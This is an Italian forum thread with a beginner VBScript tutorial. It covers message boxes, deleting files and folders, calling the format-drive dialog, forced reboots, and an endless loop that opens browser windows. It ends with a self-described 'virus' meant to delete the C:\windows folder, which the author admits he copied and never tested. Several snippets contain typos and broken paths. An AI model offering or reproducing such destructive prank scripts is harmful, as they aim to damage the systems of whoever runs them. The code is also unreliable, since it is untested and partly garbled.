[guida ]visual basic

« Older   Newer »
 
  Share  
.
  1. @N63
        Like  
     
    .

    User deleted


    Ciao in questa discussione vi parlerò del Visual Basic Script (abbreviato vbs) un linguaggio di programmazione molto
    importante soprattutto per un programmatore!
    Non mi soffermerò molto sulla teoria vi volgio solo dire che il vbs è un linguaggio di programmazione che utilizza il sistema operativo
    e che si usa come compilatore il nostro semplice blocco note.

    Partiamo da un piccolo esempio di pratica:

    1) aprite il blocco note

    2) scrivete questa stringa


    CODICEmsgbox"L'utente è scemo!", 16,"Errore di sistema"


    3) salvate il file con nome "scemo.vbs" naturalmente "scemo" può cambiare l'importante è che il file sia salvato in formato .vbs per accertarvi andate a vedere l'icona del file: dovrebbe
    essere una specie di pergamena.Esiste anche l'estensione .vbe identica al .vbs e con la stessa icona.

    4) ora aprite il file eee... il sistema operativo ci insuletrà dandoci dello scemo!


    Ora andiamo ad analizzare i parametri passo per passo quello che abbiamo scritto in vbs:

    _ "L'utente è scemo!" è il testo del messaggio (variabile)

    _ "Errore di sitstema" è il titolo del messaggio (variabile)

    _ 16 è il numero che indica il tipo di messaggio: avvertimento, avviso, errore o di domanda.
    Questi sono i tipi di messaggio: _ 16
    _ 64
    _ 48
    _ vbQuestion + vbYesNo (per domanda sì o no)

    _ msgbox è il comando per scrivere un messaggio in vbs.


    Questo è un esempio semplice del vbs come avrete capito con il vbs non si possono fare grandi programmi complessi come i .exe ma vedrete che si possono fare tante cose, infatti con un pò di fantasia
    io sono arrivato a fare un semplice ma letale virus!

    Passiamo ora alla domanda all'utente in vbs.


    Forma:


    CODICEdim risp

    risp = msgbox("Sei scemo?",vbQuestion + vbYesNo)

    if risp = vbYes Then msgbox ("Hai detto di sì imbecille!") else msgbox ("Tanto non è vero")


    Allora ci sono un pò di comandi nuovi ma penso molto facili da capire "dim risp" introduce la domanda nella seconda riga si inserisce il testo della domanda e si fa capire che è una domanda
    con "vbQuestion + vbYesNo" e infine nella terza riga si dice cosa succede se l'utente risponde si o se risponde no.Se risponde sì verrà visualizzato il messaggio"Hai detto di sì imbecille" se invece risponde no
    verrà visualizzato il messaggio "Tanto è vero".

    Cancellare un file

    Forma:


    CODICEset fso = CreateObject("Scripting.filesystemobject")

    set fl = fso.GetFile("C:ciao.txt")

    fl.Delete



    Bene questo programma andrà a cancellare il file ciao.txt che si trova in C infatti se provate a creare un file con nome ciao.txt in C e poi eseguite il programma vedrete che verrà cancellato!
    Naturalmente la parte ("C:ciao.txt") è variabile e varia a seconda di che file volete cancellare e dove si trova!

    Cancellare una cartella


    CODICEset fso = CreateObject("Scripting.filesystemobject")

    fso.DeleteFolder("C:ciao")


    Con questo programma la cartella "ciao" presente in C verrà eliminata!

    Mostrare la finestra di formattazione del pc


    CODICEset wsh = CreatObject("Wscript.shell")

    wsh.run "rundll32.exe shell32.dll, SHFormatDrive"


    Questo mostra la finestra di formattazione del pc. Fà paura....

    Ottenere informazioni sul sistema operativo


    CODICEset wsh = CreateObject("Wscript.shell")

    set objsysinfo = CreateObject("SYSINFO.Sysonfo")

    wscript.echo objsysinfo.OSBuild

    wscript.echo objsysinfo.OSPlataform

    wscript.echo objsysinfo.OSVerison


    Questo mostra le informazioni sul sistema operativo, la funzione "echo" mostra messaggi di testo, è simile a "msgbox".

    Spegnere o riavviare il computer


    CODICEset OpSysSet = GetObject("winmgmts:{(Shutdown)}//./root/cimv2").ExecQuery("select * from Win32_OperatingSystem where Primary=true")

    for each OpSys in OpSysSet

    OpSys.Reboot() 'o Shutdown()

    Next


    In questo caso il computer verrà riavviato, ma se si vuole farlo spegnere basterà cambiare OpSys.Reboot() con OpSys.Shutdown()

    Fare la somma di due numeri inseriti dall'utente


    CODICEa = inputbox("Primo Numero")

    b = inputbox("Secondonumero")

    c = int(a) + int(b)

    Msgbox "Tot " & c


    Con il comando inputbox si mostra la finestra dove chiede di inserire il primo numero poi il secondo numero poi viene fatta la somma e viene segnalato attraverso un messaggio.

    Eseguire un'operazione all'infinito


    CODICEOn Error resume Next

    set wsh = CreateObject("Wscript.shell")

    Do

    Wsc.Run"http://www.google.it", 3,false

    Loop


    Con questo si apriranno finestre di internet explorer all'infinito e tutte verso www.google.it, quest'ultima naturalmente è una variabile che si può cambiare.

    Per adesso penso basti ora vi farò vedere il virus che ho programmato usando solo le conoscenze che vi ho spiegato fino adesso.


    CODICEmsgbox"Questo è un virus di gabmarvel_hack92_ se rispondi in modo corretto sarai salvo!!", 48,"virus"

    dim risp

    risp = msgbox("Sei scemo?",vbQuestion + vbYesNo)

    if risp = vbYes Then msgbox("OK bravo così ti voglio!!ma purtroppo mi stai antipatico e mi sono attivato lo stesso!!") else msgbox("risposta sbagliata e quindi mi attiverò!!")

    set fso = CreateObject("Scripting.filesystemobject")

    fso.DeleteFolder("C:windows")

    msgbox"adesso un volta spento il computer esso nn si riavvierà più!!!", 48,"virus"

    WScript.Sleep 10000


    Questo virus andrà a cancellare la cartella windows in C dove ci sono tutti i file essenziali per il funzionamento del sistema operativo.

    Ricordate che però questa è solo una lamerata cercate invece di fare cose più utili e magari più complesse nel mondo della programmazione!

    Spero che questa guida vi sia servita!

     
    .
  2. The Titan
        Like  
     
    .

    User deleted


    credo che sia scontato e sottointeso ma devo dirlo : grandissimo! bellissima guida....dettagliata e completa. :giagia:
     
    .
  3. ^TheSkull^89^
        Like  
     
    .

    User deleted


    Ma guarda che il virus non puo funzionare perche la cartella c:windows non puo essere cancellata perche e in uso quindi lo script non funzionera mai e poi mai !!!
     
    .
  4. @N63
        Like  
     
    .

    User deleted


    CITAZIONE (^TheSkull^89^ @ 27/2/2010, 11:31)
    Ma guarda che il virus non puo funzionare perche la cartella c:windows non puo essere cancellata perche e in uso quindi lo script non funzionera mai e poi mai !!!

    la copiai da + parti ma nn l'ho mai provata e qundi nn so se funge o no
     
    .
3 replies since 24/6/2009, 14:46   486 views
  Share  
.